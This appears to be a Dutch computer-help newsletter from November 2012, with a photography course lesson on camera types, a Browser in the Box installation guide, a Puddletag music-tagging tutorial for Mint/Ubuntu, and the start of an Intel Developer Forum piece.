Inhoudsopgave
-Voorwoord
-Cursus Fotografie
-Browser in the Box
-Mint/Ubuntu: Taggen van je muziekcollectie
-IDF 2012: sneller & lichter
-Kisai Tenmetsu
-Windows 8 aanschaffen of toch liever niet?
-Onze novemberprijsvraag
-Cursus Access Voor Beginners - Hoofdstuk 15
-Interview
-Trusteer Rapport gebruiken of juist niet
-De 8 gevaarlijke commando's Linux terminal
-Sint apps
-Postvak-in
 

De redactie bestaat uit:
profpc (Eindredacteur)
CorVerm
Dillondarko (Junior Redacteur)
Djoane
ErpCity
femke98
jackall
OctaFish

De redactie is te bereiken op nieuwsbrief@helpmij.nl. Naar dit e-mailadres géén vragen sturen die betrekking hebben op computers en dergelijke. Deze horen op het forum geplaatst te worden.

Oplage
De nieuwsbrief wordt naar 28692 unieke e-mailadressen verstuurd. Deze e-mailadressen zijn via opt-in geselecteerd.

Adverteren
Indien u een advertentie wilt laten plaatsen in deze nieuwsbrief neem dan contact op met de redactie.

nod32 bestellen

Advertentie informatie aanvragen

Aan- en afmelden
Om u aan te melden voor de nieuwsbrief kunt u naar deze pagina gaan.
Wilt u de volgende uitgaven niet meer ontvangen, dan kunt u zich hier afmelden. Is deze nieuwsbrief naar u doorgestuurd en wilt u hem zelf ontvangen? Ga dan naar deze pagina en meldt u aan. U zult dan automatisch de volgende nieuwsbrief ontvangen.

Wilt u nog eens een artikel nalezen? Wanneer u lid van de vereniging bent, kunt u hier in oude nieuwsbrieven bladeren.

DISCLAIMER
Alle handels en/of productnamen hier vermeld, zijn eigendom van de respectievelijke eigenaars. De redactie van de Helpmij Nieuwsbrief gaat uiterst zorgvuldig te werk bij de vergaring, totstandkoming en publicatie van de informatie in de nieuwsbrief. Niettemin kunnen er geen rechten worden ontleend aan de inhoud van de nieuwsbrief en sluit de redactie iedere aansprakelijkheid uit voor eventuele gevolgen, waaronder begrepen directe en indirecte schade. Het toepassen van informatie en gebruik van software is voor eigen risico. De adressen van de abonnees zullen nimmer openbaar worden gemaakt en/of verkocht aan derden. Bij misbruik van het distributiesysteem van de nieuwsbrief door onbevoegden of een mogelijke storing, van welke aard dan ook, kan de redactie niet aansprakelijk gesteld worden voor eventuele daaruit voortvloeiende schade. Het is niet toegestaan om de inhoud, of delen daarvan, zonder voorafgaande schriftelijke toestemming te gebruiken.

De redactie heeft het recht om (ingezonden) bijdragen zonder opgaaf van redenen te weigeren, dan wel te wijzigen of in te korten.


Voorwoord

Auteur: ErpCity

Top

Onze eindredacteur beleeft op dit moment zeer stressvolle en drukke dagen, reden waarom ik ditmaal de nieuwsbrief mag openen.

De op één na laatste nieuwsbrief van het jaar 2012. Het is weer omgevlogen dit jaar. Over twee weken zet de Sint in Roermond al weer voet aan wal en kort daarop start de kerstbomenverkoop. Tijd om te beginnen met geschenkenlijstjes, de eerste zinnen van een rijmpje en het slopende wikken en wegen over "wat moet ik hem/haar in vredesnaam geven". Alle cadeaugidsen voor speelgoed zijn al binnen, de eersten lagen al in september op de mat, de kinderen zitten al dagen stilletjes in een hoekje om de dingen aan te vinken waarmee de Sint hen absoluut een plezier zou kunnen doen. Als je door die folders loopt lijkt het of er van crisis of recessie totaal geen sprake is. Wij wensen alle "hulp Sinten en Pieten" bij deze vast veel succes en wijsheid!

Ook dit maal heeft de redactie er weer alles aan gedaan om een mooie editie vol met interessante artikelen te maken. De cursus fotografie waarvan u in dit nummer het eerste deel vind is zeker een aanrader voor hen die wat meer willen dan "kiekjes maken". Ook deze maand weer een prijsvraag met een leuke prijs. Eveneens in dit nummer al weer het vijftiende hoofdstuk van onze cursus Acces. Wij willen u nu vast attent maken op onze decemberprijsvraag, mis onze decembernieuwsbrief niet, want ook Helpmij.nl sluit het jaar knallend af met een klapper van een prijs voor de winnaar!

Wij wensen iedereen veel leesplezier met deze nieuwsbrief!




Cursus Fotografie

Auteur: OctaFish

Top

Inleiding

De komende maanden gaat Helpmij.nl een cursus Fotografie publiceren. In deze cursus leert men wat er allemaal komt kijken bij het maken van een goede foto. Daarbij staat eerst de hardware in het middelpunt; fotograferen zonder camera is tenslotte een erg vluchtige bezigheid; je wilt het resultaat wel kunnen laten zien aan je naasten!

Daarbij volgen we de fotografische technieken die al sinds de uitvinding van de fotografie worden gebruikt; ondanks alle vernieuwingen van de laatste jaren is het maken van een foto namelijk in essentie nauwelijks veranderd. En de oude regeltjes werken dus nog steeds door in de fotografie.

november 2012: image002..gif Fotograferen, dat weet iedereen, is niet moeilijk. Je pakt een camera, drukt op een knop en de kiek is gemaakt. Zeker met de moderne camera’s die we nu gebruiken, kan een foto bijna niet meer mislukken. Maar of de gemaakte foto ook een goede foto is, is een ander hoofdstuk. Fotograferen, dat letterlijk schrijven met licht betekent, is heel iets anders dan het kiek‑maar‑raak schieten.

Het is echter niet iets dat men zichzelf zomaar even aan kan leren. Men moet er wèl iets voor doen. Je zult jezelf namelijk open moeten stellen voor je omgeving, en wat je daarin waarneemt. Je zult opnieuw moeten leren kijken naar de kleinste details in jouw wereld, omdat in elk detail een foto verscholen kan liggen.

Wie goed fotografeert, of dat althans probeert te doen, heeft oneindig veel méér plezier van zijn camera en van zijn foto’s. Je kijkt intenser naar je omgeving, op zoek naar onderwerpen die je kunt fotograferen; en ook als je geen camera bij je hebt zie je de meest fantastische gebeurtenissen.

Goed fotograferen vereist kennis. Al zullen alle fotohandelaren het tegendeel beweren, (met deze camera hoeft u echt nergens meer op te letten, mevrouw!) zonder kennis van belichting, scherptediepte, belichtingstijden, compositie en beeldsemantiek maak je slechts kiekjes waarvan je niet weet hoe die eigenlijk zijn ontstaan, en die dus ook niet reproduceerbaar zijn. Waar dat toe leidt, weet iedereen wel. Wie heeft er niet die ene toevalstreffer in zijn plakboek zitten?

In deze cursus behandelen we de meest elementaire onderdelen van de fotografie, die je een basis geven, waarop je je eigen fotografische identiteit kunt gaan ontdekken. We doen dit aan de hand van digitale fotografie, omdat ondertussen bijna iedereen wel een digitale camera (of smartphone) tot zijn beschikking heeft.

Daarnaast besteden we ook aandacht aan de nabewerking van de foto, zoals het converteren naar zwart-wit, omdat de creatieve fotograaf bij die conversie extra mogelijkheden krijgt om bijzondere foto’s te maken. Ook geeft de zwart-wit fotografie een foto een geheel andere dimensie, omdat je als kijker geconfronteerd wordt met een wereld die (voor de meeste mensen althans) de jouwe niet is; wij zien tenslotte alles in kleur.

Dit spelen met dimensies is één van de boeiendste aspecten van de fotografie. De fotograaf legt de kijker zijn wil op, door wàt hij fotografeert, en hóe hij het fotografeert. Ook de presentatie speelt hierbij dus een rol.

Fotografie is een abstract medium.

Deze stelling klinkt op het eerste gehoor niet erg logisch. Bij abstract denk je in eerste instantie aan schilderijen en beeldhouwwerken, waarbij de kunstenaar een paar ongeregelde vormen op het doek giet, die dan zijn diepste emoties blijken uit te drukken. Toch valt daar ook de fotografie in zijn algemeenheid onder.

Waarom? Je kunt toch alleen dingen fotograferen die echt bestaan? Het antwoord op deze vragen ligt besloten in de beperkingen die de fotografie ons oplegt. Zodra je op de ontspanknop hebt gedrukt, heb je (al dan niet bewust) allerlei keuzes gemaakt die beslissend zijn voor jouw foto. Om de stelling goed te begrijpen, moeten wij ons verdiepen in de verschillen die er zijn tussen wat wij waarnemen en wat wij fotograferen. Laten we een paar van die verschillen eens op een rijtje zetten:

Waarneming

Foto

Je staat in het land, en je kunt overal heen kijken, zonder enige begrenzing. Je ziet alles in samenhang met elkaar. Een hoog gebouw ziet er uit als een hoog gebouw.

Een foto wordt altijd begrensd door een vast kader. Je kunt niet buiten dat kader kijken: je beeldveld is dus duidelijk begrensd.

Waar je ook kijkt, je ziet altijd in 3 dimensies: lengte, breedte en diepte. Dankzij het gevoel voor diepte loop je keurig om tafels heen, en kun je de grootte van de Domtoren inschatten.

Een foto kent maar 2 dimensies: lengte en breedte. Omdat een foto de onderwerpen zelden op ware grootte weergeeft, is het niet of nauwelijks mogelijk om de ware afmetingen van de objecten goed in te schatten: is het een krokodil, of een salamander?

Alle kleuren die je ziet zijn op elk moment van de dag in beginsel hetzelfde; hooguit verandert de intensiteit en de kleurzweem door de tijd van de dag of het type weer. Rood is rood, blauw is blauw. Omdat ons oog zich altijd aanpast aan de omstandigheden, blijven de kleuren voor ons gevoel altijd hetzelfde.

Een camerasensor reageert op elk type weer anders; in een avondopname wordt elke kleur bijvoorbeeld rood en oranje, al was de oorspronkelijke kleur knalgroen!

Hoe je ook kijkt, je ziet alles in hetzelfde perspectief. Daardoor kun je alles wat je ziet op de juiste grootte interpreteren of op de juiste plaats inschatten.

 

Door gebruik te maken van verschillende objectieven, kun je de perspectivische weergave van het onderwerp veranderen. Je kunt van een toilet een balzaal maken, of van een rij pilaren een massieve wand maken.

Waar je ook bent, kun je je omgeving ruiken. Ook dit helpt om je omgeving juist te interpreteren en is een onderdeel van de beleving van die omgeving.

Met een foto kun je geen geur weergeven; je kunt aan een foto niet ruiken of er een termierenhoop op staat, of een mestvaalt. Die beleving is alleen nog maar voorbehouden aan de fotograaf!

Hetzelfde geldt voor geluid: elke plaats waar je je begeeft, is omringd met geluid. Deze associaties gebruik je ook weer in de beleving van die omgeving.

Idem dito voor geluid: alleen de fotograaf weet, dat dat idyllische plekje pal naast een startbaan op Schiphol ligt.

Zoals je ziet, zijn er nogal wat zaken, die de uiteindelijke beleving van een foto beïnvloeden. Alle mogelijkheden behandelen zou het kader van deze cursus overstijgen, maar je komt er in de loop van de cursus nog wel een paar tegen!

In de cursus zul je merken, dat de verschillende onderwerpen door elkaar heen aan de orde komen, al proberen we een onderwerp zo compleet mogelijk te behandelen. De onderwerpen worden zoveel mogelijk in hun samenhang behandeld.

De Camera

Zoals je zou kunnen verwachten, zijn alle camera’s in principe gelijk. Ze bestaan allemaal uit een lichtdichte doos, waaraan aan de ene kant een lichtafsluitbare lens zit, en aan de andere kant een lichtafsluitbare filmwand. Op dit principe zijn diverse variaties gebouwd, die voor ons echter niet allemaal even interessant zijn. We beperken ons hier tot de zogenaamde kleinbeeldcamera’s. Dit zijn camera’s die gebruik maken van het negatiefformaat 24´36 mm, de zogenaamde kleinbeeldfilm. Binnen deze groep zijn er drie belangrijke types camera’s te vinden, nl. de spiegelreflex, de compactcamera en de hybride camera. Deze types kennen alle hun specifieke eigenschappen, die wij hier in het kort zullen behandelen.

De Spiegelreflexcamera

Voor ‘spiegelreflex' dien je tegenwoordig bijna altijd autofocus te lezen, omdat dat momenteel het meest verkochte type spiegelreflexcamera is. Het zijn meestal camera’s met zeer veel instelmogelijkheden en programma’s. Het bedieningscomfort is hoog: vanwege de autofocus hoeft de gebruiker niet meer zelf scherp te stellen, en vanwege de ingebouwde motordrive hoeft er ook niet meer te worden getransporteerd.

november 2012: image006..gif Daarbij vergeleken is de ouderwetse spiegelreflex een zeer Spartaanse camera, omdat bijna alles met de hand moet worden ingesteld. Daar staat dan weer een veel gunstiger prijsniveau tegenover. Ook is de ‘ouderwetse’ spiegelreflex een zeer goed type om het fotograferen mee te leren, juist vanwege het feit dat je alles zelf moet instellen! Jammer zijn er geen ouderwetse digitale camera's; die werken allen met filmrolletjes.

De digitale Spiegelreflexcamera

november 2012: image007..jpg Wat de laatste jaren het meest verkocht wordt, en waar we ons met deze cursus op gaan richten, is de digitale (spiegelreflex) camera. Deze verschilt eigenlijk niet eens zo heel veel van de bovengenoemde analoge camera; zelfs de vorm ervan is grotendeels identiek gebleven, al zijn de camera's nu veel meer gestroomlijnd dan vroeger. Wat is er dan anders aan een digitale camera dan aan bovengenoemde typen?

Het belangrijkste verschil is de manier waarop de foto's worden opgeslagen: niet meer op een (analoge) film, maar op een geheugenstick. En daarmee kun je veel meer foto's opslaan dan je gewend was. En dank zij de schermpjes, kun je de foto meteen bekijken, en eventueel onmiddellijk weer verwijderen als hij je niet aan staat.

De spiegelreflexcamera is al met al het meest uitgebreide camerasysteem dat je kunt kopen. De camera’s zijn er in diverse prijsklassen, evenals de toebehoren zoals objectieven. Het principe is in theorie heel simpel: de zoeker is d.m.v. een spiegel gekoppeld aan de lens, zodat je altijd in de zoeker door de lens kunt zien wat er daadwerkelijk op je foto komt, vandaar ook de naam. De techniek erachter is heel wat ingewikkelder: er zijn nogal wat optische trucs nodig om het beeld leesbaar rechtop in de zoeker te krijgen!

De spiegelreflex heeft 2 nadelen: ten eerste zie je nooit exact wat je fotografeert, omdat op het moment van de opname de spiegel moet worden opgeklapt, ten tweede maakt de camera bij de opname vrij veel geluid dankzij diezelfde spiegel, zeker als je een autofocuscamera hebt, waar ook nog het filmtransport bij komt.

Daar staan nogal wat voordelen tegenover:

  • het fantastische aanbod aan objectieven: variërend van groothoek tot supertele en allerlei zoomobjectieven er tussendoor zwermend
  • de controle die je hebt over het beeld, doordat je altijd door de camera kunt zien wat er op de film komt
  • het bijna oneindige scala aan instelmogelijkheden, dat je vooral bij de duurdere modellen aantreft, hoewel je juist bij niet-autofocus camera’s heel veel instelmogelijkheden hebt, terwijl die camera’s heel betaalbaar zijn!

De Compactcamera

Deze camera is ontworpen voor de mens, die niet teveel heisa aan zijn hoofd wil, maar gewoon een klein cameraatje, dat gemakkelijk mee is te nemen.

november 2012: image010..gif De compactcamera onderscheidt zich van de spiegelreflex doordat de zoeker waardoor naar het onderwerp gekeken wordt, op een andere plaats op het camerahuis zit dan de lens. Dit heeft 2 voordelen: de camera is in het gebruik heel geruisloos, omdat het enige bewegende gedeelte in de camera de sluiter is, en je hebt altijd controle over wat je fotografeert, omdat je altijd door de zoeker kunt blijven kijken.

De digitale variant van de compactcamera heeft geen aparte zoeker, maar wel een beeldscherm. Je kijkt dan ook bij het maken van een foto altijd op dit scherm om te zien wat je fotografeert.

De meeste compact camera’s hebben als nadeel dat de objectieven niet te verwisselen zijn, zodat je vastgebakken zit aan het objectief dat er op zit. Vaak is dit daarom een zoomobjectief, zodat je toch verschillende instellingen kunt maken. Alleen de hele dure professionele uitvoeringen kennen verwisselbare objectieven. Omdat de compactcamera zo klein mogelijk moet blijven, is de consequentie voor het objectief, dat dit ook zo klein mogelijk is gemaakt. Dit gaat dan ten koste van de lichtsterkte.

Een ander nadeel bij analoge compact camera's is de plaatsing van de zoeker. Omdat je vanuit een andere hoek naar je onderwerp kijkt, krijg je iets anders in de zoeker te zien dan wat je daadwerkelijk fotografeert. Dit verschijnsel heet parallax. Vooral oudere compactcamera's hadden daar geen adequate oplossing voor. Er werd dan een kader in het zoekerbeeld geëtst, waarin zich het onderwerp dan zou moeten bevinden. De nauwkeurigheid van die werkwijze was met name bij dichtbij-opnames niet echt hoog. Er zijn sindsdien een paar methodes ontwikkeld om dit effect te elimineren, maar vooral bij dichtbij-opnames kan het nog steeds hinderlijk optreden.

De Hybride camera

Sinds de jaren '80 bestaat er een tussenvorm van bovengenoemde types, nl. de hybride camera.

november 2012: image012..gif Deze camera is een mengvorm van de spiegelreflex en de compact-camera. Het is een type spiegelreflex, met het uiterlijk van een moderne compact, zodat we ook hier een niet-verwisselbaar objectief zien in een compacte behuizing. De mogelijkheden zijn t.o.v. de compactcamera een stuk uitgebreider, omdat er vaak meer belichtingsprogramma’s opzitten, en een uitgebreider zoomobjectief.

Deze camera’s bestaan alleen maar in een autofocusuitvoering, zodat het niet de goedkoopste camera’s zijn. Maar zij bieden erg veel mogelijkheden, en zijn over het algemeen snel aan te leren en te gebruiken.

Overeenkomsten en verschillen analoog en digitaal

Digitale camera’s zijn, zoals eerder al gememoreerd, vaak gebaseerd op hun analoge broeders, al zie je wel dat er verbeteringen in modellen worden toegepast. De digitale spiegelreflex hierboven heeft bijvoorbeeld een kantelbaar scherm, wat bijzonder handig is bij het fotograferen. De verdere layout van de camera is echter redelijk traditioneel.

Maar dat hoeft camerabouwers er uiteraard niet van te weerhouden om zo af en toe eens te kijken of er niet ook andere cameravormen mogelijk zijn. Als je een beetje rondkijkt in een fotowinkel, dan zie je vast nog wel toestellen die een afwijkende vorm hebben. Een voorbeeldje uit het verleden is deze Sony:

november 2012: image013..jpg

Deze camera uit 1999 bestaat uit een zoomobjectief dat met een scharnier aan de body is bevestigd. Resultaat: de camera was vanuit de meest onmogelijke hoeken te bedienen, simpel door de body te verdraaien. Je kon dus heel simpel overhead shots maken, of juist heel laag fotograferen. Daarnaast had de camera een objectief van Carl Zeiss, wat één van de beter objectieven fabrieken is. Toen deze camera uit kwam, was het dan ook een behoorlijke sensatie!

Aan de andere kant heb je modellen waarvan de digitale variant zich bijna één-op-één met de analoge modellen verhouden. Sterker nog: er is een tendens gaande naar digitale modellen die als twee broertjes lijken op de vroegere analoge variant!

Kijk maar eens naar deze twee camera's:

 

november 2012: image017..jpg

november 2012: image015..jpg

Leica M6

Leica M9

Eén van de twee is digitaal, de ander is analoog. Eigenlijk kun je alleen maar op basis van het serie nummer (M9 is nieuwer dan M6) voorzichtig concluderen dat de M9 dan wel digitaal zal zijn.

Kortom: aan de vorm van de analoge camera’s an sich mankeerde niet zo veel; hooguit is het gebruikersgemak de laatste jaren enorm toegenomen!

Middenformaat camera's

Voor de volledigheid vermelden we nog het type middenformaat camera’s. Eigenlijk is dit geen cameratype, maar meer een groep, net als de kleinbeeldcamera. Deze groep camera's maakt gebruik van een rolfilm, waarbij het negatiefformaat 56´56 mm is. Dankzij het beeldformaat is de afbeeldingskwaliteit superieur aan het kleinbeeldformaat, en het wordt dan ook veel gebruikt door fotografen en gevorderde amateurs. Het bekendste voorbeeld van dit formaat is de Hasselblad, die een  ‘must' schijnt te zijn voor elke zichzelf respecterende fotograaf. Buiten de uitstekende kwaliteit van deze camera valt echter voornamelijk de extreem hoge prijs op!

Ook deze groep camera’s kent tegenwoordig digitale varianten, waarbij de voordelen in tact blijven; door het grotere beeldformaat is de kwaliteit superieur aan die van kleinbeeld camera’s. De prijzen van digitale middenformaat camera’s zijn (schrikbarend) veel hoger dan kleinbeeld camera’s, dus deze variant is voorlopig voorbestemd voor professionele fotografen, of goed in de slappe was zittende amateurfotografen.

De Polaroid camera

november 2012: image019..jpg

Het laatste type dat ik hier aan wil stippen, is de kant-en-klaar camera, de Polaroid camera. Bij deze camera heb je gelijk resultaat, omdat er direkt een foto uit het apparaat komt. De camera wordt dan ook veel gebruikt voor de ‘snelle hap' fotografie. Dit type camera is voor serieus fotgraferen absoluut niet geschikt, omdat de meest elementaire bedieningsfuncties ontbreken. Toch is er wel een nuttige functie voor te bedenken: Omdat het procedé qua eindresultaat wel degelijk op fotografisch materiaal is gebaseerd, kun je met een polaroidfoto bijvoorbeeld kleur en lichtverhoudingen in je foto controleren.
Professionele fotografen hebben dan ook vaak een polaroid achterwand bij hun camera's.

De eerste digitale camera

De digitale camera is uitgevonden in 1975, door Kodak. Wat op zich wel vreemd is, omdat Kodak toen de grootste fabrikant was van filmrolletjes. En daar dus een goede boterham aan had. Dus door de digitale camera uit te vinden, zou je kunnen stellen dat ze zichzelf niet alleen in de voet hebben geschoten, maar tegelijkertijd ook maar wat benen hebben geamputeerd!

Dat model was bepaald niet erg gebruikersvriendelijk, en ook de resolutie liet uiteraard wel wat te wensen over. De technische ontwikkelingen gingen daarna echter snel, zeker als je het vergelijkt met de ontwikkeling van het analoge fototoestel.

Wat de digitale camera in de beginjaren vooral opbrak, was de kwaliteit van de opgeslagen beelden. De resolutie was in de beginjaren gewoon te laag om de toestellen te laten concurreren met analoge fotocamera's. Sinds camera's beelden van minstens 8MB kunnen maken, is het kwaliteitsaspect niet meer van belang; digitale camera's maken nu net zulke scherpe beelden als met analoge fotografie mogelijk is. En bepaal je de keuze voor analoog of digitaal op hele andere gronden.

Lomografie

Vreemd genoeg is er een beweging ontstaan die de omgekeerde weg bewandelt. Een aantal jaren geleden heeft een kleine groep mensen de ouderwetse analoge Russische LOMO camera ontdekt. Deze camera is dermate slecht, dat hij in het westen nooit goed heeft kunnen verkopen. Wat blijkt nu? Er zijn mensen die de bijeffecten in de foto's die met deze (echt inferieure!) camera's worden gemaakt juist bijzonder op prijs stellen! De met een LOMO camera gemaakte foto's zijn dermate herkenbaar als een foto van een LOMO, dat er een hele vorm van fotografie omheen is ontstaan: de lomografie. En zoals dat tegenwoordig gaat: zoiets krijgt vanzelf een eigen community op het internet, waar mensen foto's met elkaar delen, en waar de camera zelf ook weer gekocht kan worden. Want ook dat is een vreemde gang van zaken: een camera die eigenlijk nog te slecht is om in een donker steegje te laten liggen, wordt nu weer volop geproduceerd!

 Het is dus nog te vroeg om te zeggen of de analoge fotografie gaat verdwijnen, al lijkt het er nu op dat er altijd een niche markt voor zal blijven bestaan.

Samenvatting

In dit eerste hoofdstuk hebben we de verschillende soorten camera’s bekeken. Daarbij hebben we een stevig oog op het verleden gehouden, omdat veel camera’s zijn gebaseerd op die oudere types. En terecht, want de (analoge) fotocamera is een door de jaren heen goed ontwikkeld concept geworden, waar eigenlijk niet zo heel veel aan te verbeteren blijkt. Al blijven camera-fabrikanten dat uiteraard wel proberen.

In het volgend hoofdstuk gaan we ons verdiepen in een belangrijk onderdeel van het fotograferen: de belichting. Want hiermee wordt de basis gelegd voor een goede foto. Goed belichten is dermate complex, dat we dit onderdeel in verschillende hoofdstukken gaan behandelen.




Browser in the Box

Auteur: CorVerm

Top

Veiligheid is een veel besproken onderwerp als het over surfen gaat. Het valt niet te ontkennen dat malware een groot probleem vormt en een  gemeenschappelijke zorg die alle belangrijke browserbouwers delen. De vraag is en blijft immers hoe de browser zo veilig mogelijk te maken. Wie de veiligste browser bouwt trekt de meeste gebruikers.

De meest veilige oplossing is ontwikkeld door het Duitse Sirrix AG. Browser in the Box is een browser die in een “doos” draait. Dat wil zeggen dat deze browser in de virtuele omgeving van VitualBox z’n kunsten vertoont. Op verzoek van de Duitse overheid is Bitbox ontwikkeld voor het overheidsapparaat aldaar. Al enige tijd geleden is Bitbox vrijgegeven voor algemeen gebruik.

Om verwarring te voorkomen

  • Het programma heet Browser in the Box (afgekort Bitbox)
  • Het programma draait in VirtualBox
  • De browser heet Iceweasel

Bitbox, wat is het?

Iceweasel  ingebakken in VitualBox. Maar wat is Iceweasel eigenlijk? Wel, het is een soort Firefox dat ontwikkeld is door de Mozilla community. VitualBox is de “doos” waarin de browser draait, met andere woorden: de browser draait virtueel, afgeschermd van het zogeheten gastheersysteem. Windows XP, Vista en 7, evenals verschillende Linux distro’s zoals Debian Linux, Ubuntu , OpenSUSE en Gentoo zijn geschikt om als gastheersystemen dienen.

Het voordeel van Bitbox

Juist omdat Browser in the Box in een virtuele omgeving draait isoleert het volledig alle activiteiten van het gastheer-besturingssysteem. Zodoende blijft het volledig gescheiden van de rest van het systeem, waardoor malware geen kans krijgt om het systeem te besmetten. Er zijn browsers zoals Google Chrome die standaard gebruik maken van zogenoemde ‘sandboxing’-technieken om bepaalde processen van de rest van je systeem af te schermen. Dat maakt internetten al een stuk veiliger, maar waarom je browser niet compleet virtueel draaien? Dat geeft veel meer veiligheid.

Bitbox downloaden en installeren

november 2012: downloadknop..jpg

Browser in the Box is hier te downloaden.

Aber, was ist falsch? Er verschijnt een levensgroot formulier dat ingevuld moet worden en waar het hemd van het lijf wordt gevraagd. Gelukkig staat boven het formulier de melding dat de download beschikbaar is indien je privégebruiker bent. Klik op de knop Ich bin ein Privatanwender… om de download te starten.

Zodra het bestand binnen is kan de map waarin de download is opgeslagen geopend worden. Dubbelklik op het bestand zoals in afbeelding 1 is weergegeven en geef de locatie op waar het bestand uitgepakt moet worden.

november 2012: 2 browser in the box archive..jpg
Afbeelding 1

november 2012: 3 browser in the box installatiemap..jpg
Afbeelding 2

De bestanden komen terecht in de map BitBoxInstallation, waarin zich de bestanden bevinden zoals afgebeeld in afbeelding 2. Dubbelklik op het setup bestand  Browser in the box om de installatie te beginnen. Klik in het installatievenster op de knop I Agree om akkoord te gaan met de voorwaarden en de installatie kan beginnen.

Standaard installeert Bitbox in de Standard mode. Kies je voor de Expert mode dan beslis je zelf of je toestaat dat (tekst)kopiëren vanuit de browser naar het Windows klembord  tot de mogelijkheden (kies dan voor deny) gaat behoren en andersom is dat ook het geval. Ook kun je voor een kopieer actie eerst om toestemming laten vragen (ask user for confimation).

november 2012: instellingen 1..jpg

Het gevolg van deze installatiekeuze is dat er nog meer instellingen aan te pas komen om de installatie af te kunnen ronden.

november 2012: instellingen 2..jpg

november 2012: instellingen 3..jpg

In de linker afbeelding is te zien wat de volgende instelling is. Welke data blijvend opgeslagen moeten worden is de vraag. Te kiezen is uit all (instellingen en bladwijzers), alleen bookmarks (bladwijzers) of none (niets). Het venster dat rechts afgebeeld staat behoeft verder geen aandacht, laat de instelling zoals die er staat. Verder is het een kwestie van “door de vensters heen te klikken”.  

Er komen echter (of je voor de Standard mode of voor de Expert mode hebt gekozen) tijdens de installatie nog een aantal belangrijke zaken aan de orde.

november 2012: 4etup..jpg

 november 2012: 5 setup adobe..jpg

Een vereiste is om Oracle VirtualBox te installeren. Immers is VirtualBox noodzakelijk om de browser virtueel te laten draaien, een klik op de knop OK is voldoende om het programma te installeren. Klik ook nu weer lustig door alle schermen heen om de installatie te voltooien. Een andere vereiste is om Adobe Acrobat Reader te installeren zodat .pdf-bestanden kunnen worden gelezen.

november 2012: 6 installatie succes..jpg

Als de installatie voltooid is komt de melding in beeld dat die succesvol is verlopen, met daaraan gepaard de mededeling dat de eerste start best wel even kan duren. En dat is ook zo. Reken gerust op een minuut of twee, maar dan heb je ook wat.

november 2012: 7 opstarten browser..jpg

Bitbox draait, wat kunnen we verwachten?

Met Bitbox hebben we een snelle browser in huis gehaald die z’n werk uitstekend doet. Snel, veilig en betrouwbaar. (You Tube)filmpjes bekijken en .pdf-bestanden openen (dankzij het geïnstalleerde Adobe Reader) is geen probleem. Dat alles in, laat het nog maar eens gezegd zijn, een omgeving die geheel afgeschermd is van het besturingssysteem.

Het voordeel van Bitbox is nu wel duidelijk. Zitten er ook nadelen aan deze manier van bladeren op het internet? Toch wel, want net zomin dat malware het systeem kan bereiken om het te besmetten, kunnen downloads ook je systeem niet bereiken. Je stuit op een leuk programma, of iets anders dat de moeite van het downloaden waard is, waar laat je het dan. Er bevindt zich wel een map downloads in Iceweasel maar uiteraard zit het gedownloade bestand inderdaad in de box en kan er niet uit. Dat laatste houdt in dat een gedownload bestand niet toepasbaar is in het besturingssysteem.

Instellingen in Bitbox

 november 2012: 8 plug-ins..jpg

Veel valt er in Bitbox niet in te stellen. Een klik op het Bitbox icoontje, te vinden in het systeemvak, opent het Settingsscherm.

Uiteraard is hier de opslaglocatie voor de downloads tevergeefs opgegeven. De instelling voor de taal heeft ook geen nut, want het Nederlands is niet beschikbaar voor Iceweasel. Evenmin als andere talen.

november 2012: 8-2 plug-ins..jpg
Een deel van de beschikbare opties

Hoewel in de add-on beheerder (Tools > Add-ons) er wel degelijk een tab Languages te vinden is waaronder verschillende talen te vinden zijn. Deze zijn echter niet bedoeld om de interface van Iceweasel van taal te doen wijzigen. Straks meer daarover, maar eerst nog een aantal opmerkingen over add-ons en plug-ins.

november 2012: 9 plug-ins..jpg

Standaard worden in Iceweasel een aantal plug-ins en een add-on geïnstalleerd. Firefox gebruikers weten hoe met plug-ins en add-ons om te gaan. Gebruikers van 

andere browsers staan misschien wat vreemd tegenover het gebruik van deze zaken.

 november 2012: taal..jpg

Dan nog even over het instellen van de taal. Zoals gezegd gaat het dan niet over de taal waarin het programma wordt weergegeven, maar over de taal waarin een website beschikbaar is.

Ga naar het menu Edit > Preferences. Klik in het venster Iceweasel Preferences op de knop Content en vervolgens op Choose achter de tekst Languages.

Selecteer een taal door op het pijltje te klikken naast Select a language to add. Uit de hele lange lijst met talen kies je Dutch [nl], waarna een klik op de knop Add de taal aan de lijst toevoegt. Klik op Dutch [nl] en vervolgens op de knop Move Up om het Nederlands als eerste weergavetaal in te stellen.




Mint/Ubuntu: Taggen van je muziekcollectie

Auteur: femke98

Top

Puddletag

Werk je met Linux Mint of Ubuntu? Heb je een grote muziekverzameling of misschien slechts een paar albums en je wilt een nette verzameling met covers, artiestennaam en andere informatie? En je hebt al vaker gezocht naar een goede tag bewerker voor op je computer maar niet echt gevonden wat gebruiksvriendelijk is? Dan heb ik een leuk programma voor je gevonden, namelijk: Puddletag.

Dit programma lijkt erg op het Windowsprogramma MP3Tag, maar is in feite nog gemakkelijker aangezien het functioneert als een tabel waar je makkelijk veel tags in kunt vullen.

Installatie

Puddletag is te vinden in Synaptic en in het Softewarebeheer en is dus makkelijk te installeren (zie foto). Er is ook een .deb bestand beschikbaar en die kan je hier vinden.

Synaptic.

Taggen

Wanneer je Puddltag hebt geïnstalleerd, kunnen we het programma openen en starten met taggen. Je vindt het programma terug onder Sound and Video.
Open eerst een album door op het mapje linksbovenin te drukken.
Selecteer daarna eerst alle nummers die in je muziekmap staan, dat kan met CTRL+A

Locatie

Taggen.

Nu kan je beginnen de tags in te voeren.
Je kan de de informate van het album jaar, genre, artiest en albumnaam invullen. De titel kan je invoeren door dubbel te klikken op een kolom. Als je alles hebt ingevuld, dan druk je boven in het paneel op Windows en vervolgens kies je Artwork. Plaats dan een bestandje met de afmetingen van 500x500 met de naam folder.jpg in de albummap.

Cover toevoegen.

Wanneer je dan terugkomt in Puddletag, klik je met je rechtermuisknop op het zwarte vlak "Artwork" en kies je Add cover, je selecteert dan vanaf daar de folder.jpg

Als je klaar bent, dan kan je de tags opslaan door naar File te gaan en dan op Save te klikken. Het kan even duren en het lijkt er zelfs op dat je computer vast loopt of niets doet, maar dit proces kan een tijdje duren, zeker als je veel info hebt ingevoerd.

Proces.

Makkelijker kan het haast niet en daarom wens ik jullie veel succes met het taggen van je muziekcollectie!




IDF 2012: sneller & lichter

Auteur: Dillondarko

Top

november 2012: IDF..jpg

Vanaf 11 tot en met 13 september werd door Intel een feestje gehouden in San Francisco: het Intel Developer Forum 2012. Was het een leuk feestje? Gezien de nieuwe technologieën die er getoond werden zeker wel.

